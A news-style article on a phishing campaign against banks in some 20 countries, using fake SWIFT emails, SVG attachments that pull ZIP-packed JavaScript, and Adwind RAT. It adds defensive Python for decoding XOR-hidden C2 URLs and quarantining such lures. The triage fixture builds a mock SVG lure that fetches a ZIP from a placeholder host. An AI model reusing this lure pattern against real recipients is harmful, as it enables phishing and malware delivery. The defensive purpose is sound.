Are global banks facing a coordinated cyberattack? Nepali cybersecurity firm Bhairav Tech has revealed a sophisticated phishing campaign targeting financial institutions across Europe, Oceania, Africa, and Asia. Their recently published report uncovers alarming details about how cybercriminals are exploiting vulnerabilities to compromise financial systems worldwide.
What Does the Report Say About the Cyberattack?
According to Bhairav Tech’s Security Operations Center:
- Targeted Institutions: Financial institutions in over 20 countries, including Nepal, are under attack.
- Attack Methodology: Hackers are using malware-laden phishing emails to deceive users and steal sensitive data.
- Suspected Culprit: The Lazarus Group, known for high-profile cybercrimes, is believed to be behind this attack.
How Are Hackers Exploiting Phishing Emails?
- Fake SWIFT Emails:
  - Attackers mimic the Society for Worldwide Interbank Financial Telecommunication (SWIFT), a trusted global financial messaging system.
  - Phishing emails appear legitimate, often thanking users for using SWIFT services and including fake payment details.
- Hidden Malware:
  - Emails carry malicious SVG attachments that fetch ZIP archives containing JavaScript.
  - Once executed, the malware infiltrates the system, steals credentials, and harvests sensitive emails from Outlook.
- Sophisticated Malware Techniques:
  - Attackers use Adwind RAT, a cross-platform Remote Access Trojan, to extract personal data and monitor systems.
  - Malware communicates with Command and Control (C2) servers using XOR-encrypted URLs, hiding the server addresses from simple string-based detection.
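XOR-encoded C2 URLs defeat plain string matching, but an analyst can usually recover them from a captured sample because every URL starts with a known plaintext ("http://" or "https://"). The following Python helper is an added example, not part of the Bhairav Tech report or the malware it describes: it assumes the URLs were XOR-encoded with a short repeating key, derives the candidate key from that known prefix at each offset, and keeps only keys under which the rest of the bytes still read as a URL. The key K3y, the URLs and the surrounding junk bytes are constructed for the demonstration.

```python
"""Recover XOR-obfuscated URLs from a byte blob (analyst-side helper).

Added example; it is not code from the report. It assumes the sample
XOR-encodes its URLs with a short repeating key and relies on the fact
that every URL begins with a known plaintext prefix.
"""
import re

KNOWN_PREFIXES = (b"http://", b"https://")
# A decoded candidate must continue as scheme://host.tld[:port][/path];
# requiring a dotted host weeds out chance hits from random bytes.
URL_RE = re.compile(rb"https?://[A-Za-z0-9\-]+(?:\.[A-Za-z0-9\-]+)+(?::\d+)?(?:/[!-~]*)?")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; XOR is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_urls(blob: bytes, max_key_len: int = 6) -> list[tuple[int, bytes, bytes]]:
    """Return (offset, key, url) for each offset where some repeating key of
    length <= max_key_len turns the bytes into a URL.

    Known-plaintext attack: if the plaintext at `off` starts with `prefix`,
    then key[i] == blob[off + i] ^ prefix[i]. Keeping max_key_len shorter than
    the prefix leaves at least one prefix byte to verify the candidate key.
    """
    hits: list[tuple[int, bytes, bytes]] = []
    seen: set[bytes] = set()
    for prefix in KNOWN_PREFIXES:
        for off in range(len(blob) - len(prefix) + 1):
            for key_len in range(1, min(max_key_len, len(prefix)) + 1):
                key = bytes(blob[off + i] ^ prefix[i] for i in range(key_len))
                plain = xor_bytes(blob[off:], key)
                if not plain.startswith(prefix):
                    continue  # key inconsistent with the rest of the prefix
                match = URL_RE.match(plain)
                if match is None:
                    continue  # prefix decoded but no plausible host followed
                url = match.group(0)
                if url in seen:
                    continue  # same URL already found under a shorter key
                seen.add(url)
                hits.append((off, key, url))
                break  # shortest consistent key wins for this offset
    return hits


# Constructed sample: a 3-byte key and two NUL-terminated URLs behind junk.
DEMO_KEY = b"K3y"
DEMO_URLS = (b"https://c2.example.invalid/gate.php",
             b"http://mirror.example.invalid:8080/u")


def demo_blob() -> bytes:
    """Build the constructed sample: 4 junk bytes, then each URL XOR-encoded."""
    junk = b"\x00\x00\x00\x00"
    return junk + b"".join(xor_bytes(u + b"\x00", DEMO_KEY) for u in DEMO_URLS)


if __name__ == "__main__":
    for off, key, url in recover_urls(demo_blob()):
        print(f"offset={off} key={key!r} url={url.decode()}")
```

Run against a real sample, the recovered hosts become the indicators to block at the egress proxy and to hunt for in DNS logs; the same routine works on strings carved from memory or from a decoded JavaScript stage.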
Which Countries Are Affected?
The attack spans multiple continents, targeting banks in:
- Europe: Italy, Austria, Hungary, Moldova, Serbia
- Asia: Nepal, India, Pakistan, South Korea, Cambodia
- Oceania: Papua New Guinea
- Africa: Ethiopia, Nigeria
- Middle East: UAE, Jordan, Saudi Arabia, Turkey, Azerbaijan
How Does the Malware Work?
- Phishing Initiation:
  - Emails originate from lookalike addresses such as “swiftmyi1@financeplus[.]me,” designed to appear authentic.
  - Once the SVG attachment is opened, it downloads malicious ZIP files.
- Execution of JavaScript Malware:
  - The files run hidden scripts that display a fake receipt while infiltrating the device in the background.
  - The Java Runtime Environment (JRE) is installed if missing, enabling the malware to function.
- Control and Data Theft:
  - The malware connects to C2 servers, downloads additional harmful scripts, and steals browser credentials and email data.
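The chain above gives a mail gateway two cheap places to stop the lure before any JavaScript or JRE is involved: a SWIFT-themed sender on a domain that is not SWIFT's, and an SVG attachment that carries script or points at a ZIP. The Python triage below is an added example written for this article, not code from Bhairav Tech or from any product; it parses a message with the standard library, applies both checks and returns a quarantine verdict. The message bodies are constructed, financeplus.example stands in for the lookalike domain quoted above, lure.example.invalid is a placeholder host, and swift.com is assumed to be the only legitimate SWIFT sender domain.

```python
"""Mail-gateway triage for the SWIFT-themed SVG lure (added example).

Not code from the report. Assumptions: swift.com is the only legitimate
SWIFT domain; financeplus.example stands in for the lookalike domain in
the article; all messages and attachments below are constructed.
"""
import email
import re
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

BRAND_WORDS = ("swift",)
LEGIT_BRAND_DOMAINS = {"swift.com"}  # assumption: replace with your allow-list

# Patterns that a benign payment-advice image has no reason to contain.
SVG_RULES = (
    (re.compile(rb"<script\b", re.I), "svg-embedded-script"),
    (re.compile(rb"\son[a-z]+\s*=", re.I), "svg-event-handler"),
    (re.compile(rb"https?://[^\s\"'<>]+\.zip\b", re.I), "svg-remote-zip"),
    (re.compile(rb"\bhref\s*=\s*[\"']https?://", re.I), "svg-external-href"),
)


def sender_findings(msg) -> list[str]:
    """Flag a brand word in the display name or mailbox on a non-brand domain."""
    name, addr = parseaddr(msg.get("From", ""))
    local, _, domain = addr.rpartition("@")
    domain = domain.lower()
    hits = []
    for word in BRAND_WORDS:
        if word in f"{name} {local}".lower() and domain not in LEGIT_BRAND_DOMAINS:
            hits.append(f"brand-lookalike:{word}:{domain}")
    return hits


def attachment_findings(msg) -> list[str]:
    """Inspect every SVG attachment for script, event handlers or ZIP pulls."""
    hits = []
    for part in msg.iter_attachments():
        fname = (part.get_filename() or "").lower()
        if not (fname.endswith(".svg") or part.get_content_type() == "image/svg+xml"):
            continue
        data = part.get_payload(decode=True) or b""
        hits.extend(f"{label}:{fname}" for rx, label in SVG_RULES if rx.search(data))
    return hits


def triage(raw: bytes) -> dict:
    """Parse a raw RFC 5322 message and return findings plus a verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = sender_findings(msg) + attachment_findings(msg)
    return {"subject": str(msg.get("Subject", "")),
            "findings": findings,
            "quarantine": bool(findings)}


def build_lure() -> bytes:
    """Constructed message shaped like the campaign's lure (not a real sample)."""
    svg = (b'<svg xmlns="http://www.w3.org/2000/svg"><text y="20">Payment advice</text>'
           b'<script>window.location="https://lure.example.invalid/receipt.zip"</script></svg>')
    msg = EmailMessage()
    msg["From"] = "SWIFT Payments <swiftmyi1@financeplus.example>"  # placeholder domain
    msg["To"] = "treasury@bank.example"
    msg["Subject"] = "Thank you for using SWIFT - payment details attached"
    msg.set_content("Please find the payment advice attached.")
    msg.add_attachment(svg, maintype="image", subtype="svg+xml", filename="payment_advice.svg")
    return msg.as_bytes()


def build_benign() -> bytes:
    """Constructed internal message with nothing to flag."""
    msg = EmailMessage()
    msg["From"] = "Alice <alice@bank.example>"
    msg["To"] = "treasury@bank.example"
    msg["Subject"] = "Lunch"
    msg.set_content("Noon?")
    return msg.as_bytes()


if __name__ == "__main__":
    for raw in (build_lure(), build_benign()):
        print(triage(raw))
```

The brand check is deliberately crude (substring match); in production it belongs next to DMARC/SPF results and an allow-list of partner domains so that legitimate SWIFT correspondence is not quarantined.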
What Preventive Measures Are Recommended?
Bhairav Tech suggests:
- Employee Training: Teach staff to identify phishing emails and avoid suspicious links.
- Enhanced Security Tools: Use advanced phishing protection and behavior-based malware detection systems.
- Monitoring Systems: Implement 24/7 network and system activity surveillance.
- Access Restrictions: Limit script execution and block unauthorized applications on sensitive systems.
- Incident Response Plans: Prepare for quick action against breaches.
Why Should This Concern You?
This cyberattack highlights the growing sophistication of cybercriminals and the vulnerabilities of even the most trusted systems. As hackers continue to exploit weaknesses, financial institutions and users must stay vigilant.
Are you or your organization prepared to combat these evolving cyber threats? Share your thoughts and experiences.